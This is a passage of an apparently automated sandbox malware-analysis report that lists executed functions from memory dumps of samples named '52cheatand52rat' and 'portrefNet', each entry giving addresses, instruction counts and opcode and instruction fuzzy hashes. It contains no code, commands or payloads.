                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_^0$O_^2$O_^4$O_^6
                                        • API String ID: 0-2383015730
                                        • Opcode ID: 55b4d321bf5110345a9bed2c7e9949b33a90f6285e5e94064c057fb600d2b6d2
                                        • Instruction ID: b41423c9d0768159b0d4d02df5411f1d20eaa94b331ed1a744ffba951326ed21
                                        • Opcode Fuzzy Hash: 55b4d321bf5110345a9bed2c7e9949b33a90f6285e5e94064c057fb600d2b6d2
                                        • Instruction Fuzzy Hash: D2D012FE9900280DD6021CE418E04FC9B84860137F3202AA3D97FD9203C841D2D3D040
                                        Function 00007FFD9BAA0728 Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_^0$O_^2$O_^4$O_^6
                                        • API String ID: 0-2383015730
                                        • Opcode ID: ab70584348ba4e5f5f14a7e23e48dd19a264103c1ef843e4a4ee4b26a8f717ea
                                        • Instruction ID: ab6424e3e7eb8e67ccfe0c47acba15ccd277b26c793373c6cc31ff39da11b87c
                                        • Opcode Fuzzy Hash: ab70584348ba4e5f5f14a7e23e48dd19a264103c1ef843e4a4ee4b26a8f717ea
                                        • Instruction Fuzzy Hash: 98B00213519052009315F56C78624E457514F1D13F74C47F3F4DD0C0D76C0534858184

                                        Executed Functions

                                        Function 00007FFD9BAD16A8 Relevance: .3, Instructions: 284COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89b9853cdb576acb7a6793ad579f93a92d6010dc9252d6bbe4cd99992af114dc
                                        • Instruction ID: 21d33e0c91e0949f816514201464b5c679e141033965773bd0ed61f465fbf70a
                                        • Opcode Fuzzy Hash: 89b9853cdb576acb7a6793ad579f93a92d6010dc9252d6bbe4cd99992af114dc
                                        • Instruction Fuzzy Hash: 0A91EE31B0DA494FDB58DF5888615B977E2EFE8300B15467EE49DC32A2DE34AD02C781
                                        Function 00007FFD9BAD35FE Relevance: .2, Instructions: 217COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da8d6a3ef22bcc91557d2b5e1c7ddd983f837e2f3b961d3113e4ca5323e460
                                        • Instruction ID: 91eb40417dbfca045c43f855f1904a4b4f637a194eb67e74e9156baa361bd5ef
                                        • Opcode Fuzzy Hash: 70da8d6a3ef22bcc91557d2b5e1c7ddd983f837e2f3b961d3113e4ca5323e460
                                        • Instruction Fuzzy Hash: C5717172A1994D8FE798DB6898657EDBBE1EF99314F5003BAD01DC72DACBB418018B40
                                        Function 00007FFD9BAE5380 Relevance: .2, Instructions: 180COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aefd5678b640a1667f92de4723a147cab1064fe4620d46e390c092975b115296
                                        • Instruction ID: 42adbc620aa903d51fe1f05d16dc58d6e8f6797ad38782d4f4a7617630198a35
                                        • Opcode Fuzzy Hash: aefd5678b640a1667f92de4723a147cab1064fe4620d46e390c092975b115296
                                        • Instruction Fuzzy Hash: 5E515070E0991D8FEFA4EBA8D8A5BADB7F1FF58301F100169D00DE3295DE7569818B40
                                        Function 00007FFD9BAD1CFD Relevance: .2, Instructions: 172COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2daf47424489f4c64f234b022a35e8ecb0c1669e1d66898a632cbdb8d85aab0b
                                        • Instruction ID: 4722af20d50504ec36e23f51846b2ccff0faf80a0343403153ee68c8a4b5fe14
                                        • Opcode Fuzzy Hash: 2daf47424489f4c64f234b022a35e8ecb0c1669e1d66898a632cbdb8d85aab0b
                                        • Instruction Fuzzy Hash: 0551E430B18A894FDB5CDF5888645BA77E2FFE8300B15467EE45EC7295DE34A802C781
                                        Function 00007FFD9BAD3165 Relevance: .1, Instructions: 144COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5972ede603c08f73c177fe77e15ad7d14c7486fd5c7db504a9a60a77154561c
                                        • Instruction ID: 95b22bcabdbc25209d32d16928fb802059a0dba42de01f0d2c9217ce6069599a
                                        • Opcode Fuzzy Hash: c5972ede603c08f73c177fe77e15ad7d14c7486fd5c7db504a9a60a77154561c
                                        • Instruction Fuzzy Hash: D1512A71E0A61E8FEB64EF94C4656EDB7F1FF99300F41427AD009E72A1DA786A44CB40
                                        Function 00007FFD9BAD2115 Relevance: .1, Instructions: 140COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 592e4bbbceed701d097cd13d45e4f8d46c851df02768d575512ed724a6886c4a
                                        • Instruction ID: 3052f2a078dc8cdce6366532fa871b5a4383e792b59c1adad24057bd27432807
                                        • Opcode Fuzzy Hash: 592e4bbbceed701d097cd13d45e4f8d46c851df02768d575512ed724a6886c4a
                                        • Instruction Fuzzy Hash: BC413532B0E74A4FE765DBB8C4655B877E0EFC6310B0642BBF41CC71A6DE68A9418341
                                        Function 00007FFD9BAD1DA3 Relevance: .1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6a1718faa2b16705bb6c4d9200b05eb7edb799e4933eff8c34561cf642aeee9
                                        • Instruction ID: 7d5e155350726eda8ab8e8e28e4a8ea836f28fe062ca6398bb2f99fb93ffada6
                                        • Opcode Fuzzy Hash: e6a1718faa2b16705bb6c4d9200b05eb7edb799e4933eff8c34561cf642aeee9
                                        • Instruction Fuzzy Hash: 33315C30B18A498BDB4CDF48C8A55BA73E2FFD8715B14463EE45EC3295CE30E8528B81
                                        Function 00007FFD9BAD3401 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11acc791420efbc9fb75946622e854b56d85777ea70f11baefdf9b7d385b6a31
                                        • Instruction ID: 37fe18fdbfe613327c44bcbb7a59466ca74b688d5b56fbcc0d845a9715b06b99
                                        • Opcode Fuzzy Hash: 11acc791420efbc9fb75946622e854b56d85777ea70f11baefdf9b7d385b6a31
                                        • Instruction Fuzzy Hash: 34217C30A0A60E8FEB59EF64C4695B977E0FF58305B014ABAD41DC71A1DF78E640CB40
                                        Function 00007FFD9BAD3575 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a337bc6a39afc67de3b0d7a7d87e82448165f16793bbdd0f744d59ff1c4241c9
                                        • Instruction ID: ea158fae602b4733c70d598fe34766d7f11662eab21d7e94d7d45e805bff2160
                                        • Opcode Fuzzy Hash: a337bc6a39afc67de3b0d7a7d87e82448165f16793bbdd0f744d59ff1c4241c9
                                        • Instruction Fuzzy Hash: 1A219F31A0AA4E8FEB68EBA4C4656F977E1FF99304F0105B9C01ED71E5DF69A601CB01
                                        Function 00007FFD9BAD084D Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0694664cff29734bc1145eb23024cf7ec564e58b12b978f73499461e82b7d73d
                                        • Instruction ID: 51fa5395e5c6ee3b1d255dd86388ee4d7d5f8a38b7d63881aa7febcedd96963d
                                        • Opcode Fuzzy Hash: 0694664cff29734bc1145eb23024cf7ec564e58b12b978f73499461e82b7d73d
                                        • Instruction Fuzzy Hash: A3115731F0E54E8FEB70ABB884790ED3BE0EF95700F0645B6C059C20A2ED60A144C284
                                        Function 00007FFD9BAD335F Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3a2b1d6382d7346089ab5e5bddf7a1f5f5111b0db0477ff885976cb61ea87b8
                                        • Instruction ID: 99734cce216d6975b4313882655ea392a5e39dc73e48b2460bd435a74fd1b3c4
                                        • Opcode Fuzzy Hash: b3a2b1d6382d7346089ab5e5bddf7a1f5f5111b0db0477ff885976cb61ea87b8
                                        • Instruction Fuzzy Hash: AC21B13094E68E8FE742ABB488685E97FF0FF9B300B0945FAD458C7072DA78A545CB51
                                        Function 00007FFD9BAD0A01 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41614a021477d05bce888214f13e5f4a4e2fe64fa6f29bd9d4576b5ee14f86d8
                                        • Instruction ID: 09ecca2f26563873282b62d96e11359b62186d2c9ece03e6674fc0a36aaef1b8
                                        • Opcode Fuzzy Hash: 41614a021477d05bce888214f13e5f4a4e2fe64fa6f29bd9d4576b5ee14f86d8
                                        • Instruction Fuzzy Hash: DD119031A1950E4FE7A0EBA888691BD7BE1FF98700F4146B6D41CC60B6EE74A640C740
                                        Function 00007FFD9BAD112D Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbdf66b28e558ad1022113156e40e0661798598dbc1713d5ef70229a96d8d7fc
                                        • Instruction ID: 49bdd471bc13bcdbda82a64127506f22671013e3a69637a67b6eed17c2c2adce
                                        • Opcode Fuzzy Hash: fbdf66b28e558ad1022113156e40e0661798598dbc1713d5ef70229a96d8d7fc
                                        • Instruction Fuzzy Hash: 6B11E970A0964E4EEB699B94C4682B97BE0FFA9310F4102BFE41DC61E1DA756500C700
                                        Function 00007FFD9BAD0F30 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 063d9cc3101ab74f50d04b38bc29c1e21cf2da4868606bd37229d8f778cec824
                                        • Instruction ID: c8d7a059b97df5436a1dd1d074e424f7410ad04a0734ec2b9f3ee98e9d21975a
                                        • Opcode Fuzzy Hash: 063d9cc3101ab74f50d04b38bc29c1e21cf2da4868606bd37229d8f778cec824
                                        • Instruction Fuzzy Hash: 55116331A0990D8FEB64EB94C865FFD77A1EB98700F214375D009D71A5CE74AA85CB80
                                        Function 00007FFD9BAD34F5 Relevance: .1, Instructions: 54COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 999770ebb425ea9981ce3c7bf106c5a5e112d4be1325ac149d4522d5302241f3
                                        • Instruction ID: ae750e88d5a344844e7ad9fdc48faec5658524da4d825d65e5770dfbaf53647c
                                        • Opcode Fuzzy Hash: 999770ebb425ea9981ce3c7bf106c5a5e112d4be1325ac149d4522d5302241f3
                                        • Instruction Fuzzy Hash: 9B115E71A0968E8FDB98EFA4C8696BD7BE0FF58300F4109BED419D71A1DB75A640C700
                                        Function 00007FFD9BAD05D8 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 928b6419f4c642397f07d0807835ca45b0a80eba8951644ef3d23c4aa1ac6e44
                                        • Instruction ID: 3ca4f59639e77904f1a284d0d33eea20cad124db43af682d834a4d6387479edf
                                        • Opcode Fuzzy Hash: 928b6419f4c642397f07d0807835ca45b0a80eba8951644ef3d23c4aa1ac6e44
                                        • Instruction Fuzzy Hash: CC01D430A0A50E8FEB68EF65C0686B977A1FFA8305F51467ED40EC31A4CF71A660CB40
                                        Function 00007FFD9BAD1C71 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ced9a3b04fdfc5720415efb313fae30056571d93cb29ba92d636f4b53b20290a
                                        • Instruction ID: 339e9435db838b02c413f85f1099328a41430fe0399d994f651d2a11bd1ff428
                                        • Opcode Fuzzy Hash: ced9a3b04fdfc5720415efb313fae30056571d93cb29ba92d636f4b53b20290a
                                        • Instruction Fuzzy Hash: 7201F930A0A64D8FDBA4DF55C4656F97BA0FFA5304F81027EE40CC31A1DB759650C740
                                        Function 00007FFD9BAD281D Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 873478b7dddc75b6a012460675737109a8a7d5427d6c3b52545bc78908f7bea1
                                        • Instruction ID: 40e2b83aef737e2796782ec5d3fd6acc0eef8734ca6a067e892ffc34e97081ff
                                        • Opcode Fuzzy Hash: 873478b7dddc75b6a012460675737109a8a7d5427d6c3b52545bc78908f7bea1
                                        • Instruction Fuzzy Hash: 75017131A0A64E8FE761AFA4C4585AD7BE0EF59300F4246B6D418C60A5EA74E240C700
                                        Function 00007FFD9BAD2EB9 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63d9e9293bc3edf3e99374d09759de16f062fa3a96fe404989197ab59d839169
                                        • Instruction ID: 264a9572e771e47b7e1cc2c5e51d27bd2df70ec9b7c05a13624a884d348515d4
                                        • Opcode Fuzzy Hash: 63d9e9293bc3edf3e99374d09759de16f062fa3a96fe404989197ab59d839169
                                        • Instruction Fuzzy Hash: B7018430A4E74D4FE752EBB4C8595A97BF0EF49300F0649B7D418C70B6DA78A554C701
                                        Function 00007FFD9BAD0610 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65eeaa86774fdb49418a42d7b9208b9c4586930f55e63571e0dde9e6432cbe65
                                        • Instruction ID: 6dad18c3905c15c0a542a94baece2eef17c67f69a69e1b53b0ac703b495d56be
                                        • Opcode Fuzzy Hash: 65eeaa86774fdb49418a42d7b9208b9c4586930f55e63571e0dde9e6432cbe65
                                        • Instruction Fuzzy Hash: 34018130A19A0E8AEB68EBA4C4686B973E0FF58305F1109BED41EC21E5DF75A650CB10
                                        Function 00007FFD9BAD0608 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 45d87043ed2806167989a86316f8646eaacdea66f56361bac901acda87ef3ee3
                                        • Instruction ID: 50c17ab00635c3ec2a6b1883094a10fdae8b2b12fdffb92e1273643a03dfa93f
                                        • Opcode Fuzzy Hash: 45d87043ed2806167989a86316f8646eaacdea66f56361bac901acda87ef3ee3
                                        • Instruction Fuzzy Hash: FF018130A1560E8FEB6CEBA4C4686B973A0FF58305F11097ED41EC21E5DE75A250CA40
                                        Function 00007FFD9BAD1140 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 154538c10ca8c5709b968e9b4f69a4c83c38471946e43abe13334ebdf5c8dd62
                                        • Instruction ID: 6557aec2931e9d5075065339dea7a4e1be9fd55f0080fc9664b3201dcfe40701
                                        • Opcode Fuzzy Hash: 154538c10ca8c5709b968e9b4f69a4c83c38471946e43abe13334ebdf5c8dd62
                                        • Instruction Fuzzy Hash: 24F0A470E1A65E49FBA49BA898683FA77E0EFA6315F00027FE41DC20E1DE741214C641
                                        Function 00007FFD9BAD05D0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cedeebab0eca3f6277fca4c71966ae6ae402995460fdd6d74d5736ae3fd5181e
                                        • Instruction ID: 26a84a67a318eac9cbdd27b7dc4f8ead828f1a1af5fee2e3e8856a55ae3c7b16
                                        • Opcode Fuzzy Hash: cedeebab0eca3f6277fca4c71966ae6ae402995460fdd6d74d5736ae3fd5181e
                                        • Instruction Fuzzy Hash: B1F0FC30A0A54E8FEB64EF65C4655F977A4EF65309F41067AE80DC21E1CA75A650C740
                                        Function 00007FFD9BAD27AD Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73a0938557d19bce147a302dbcf65401d75b5401f65f4226d7391b657e84db43
                                        • Instruction ID: 454069ba2d4d7a26591d8bc12bfaf97fa83b39047ee180b0f9f49b7d0eb6b5d5
                                        • Opcode Fuzzy Hash: 73a0938557d19bce147a302dbcf65401d75b5401f65f4226d7391b657e84db43
                                        • Instruction Fuzzy Hash: 66F0963191E78E8FEB699FA4C8251F93BA0FF55201F4105BEE419C61E2EB79A550CB01
                                        Function 00007FFD9BAD2739 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2caa0fe675d975e48ad582883f8a55ba6e03b8a8597d5fe977b39ed2869bcf6f
                                        • Instruction ID: 4c2407f75c618ad9ca5fbf8aaafd5f8a3d57fef552d9f64494f03fbe8a7dc210
                                        • Opcode Fuzzy Hash: 2caa0fe675d975e48ad582883f8a55ba6e03b8a8597d5fe977b39ed2869bcf6f
                                        • Instruction Fuzzy Hash: 04F0F63090E38D8FDB299F60C8642A93B70FF46200F0205BED819C20E2DB78A514CB40